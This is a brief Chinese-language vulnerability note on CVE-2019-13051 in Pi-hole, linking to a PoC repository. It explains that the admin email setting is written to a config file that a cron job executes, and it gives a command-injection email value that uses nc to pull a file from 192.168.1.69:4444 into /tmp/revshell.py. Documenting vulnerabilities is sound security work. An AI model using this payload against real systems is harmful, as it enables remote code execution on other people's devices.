https://github.com/Mr-xn/Penetration_Testing_POC/tree/master/CVE-2019-13051
命令注入挺常见的,不过他这个地方的触发方式还挺少见。
管理员登陆之后有个修改管理员邮箱的地方,写入的值会被保存到配置文件/etc/pihole/setupVars.conf
同时有个计划任务,每十分钟会解析并执行一次这个配置文件。
代码里面也只是对邮箱地址的格式做了简单的过滤和检查
"`nc${IFS}192.168.1.69${IFS}4444>/tmp/revshell.py`"@example.com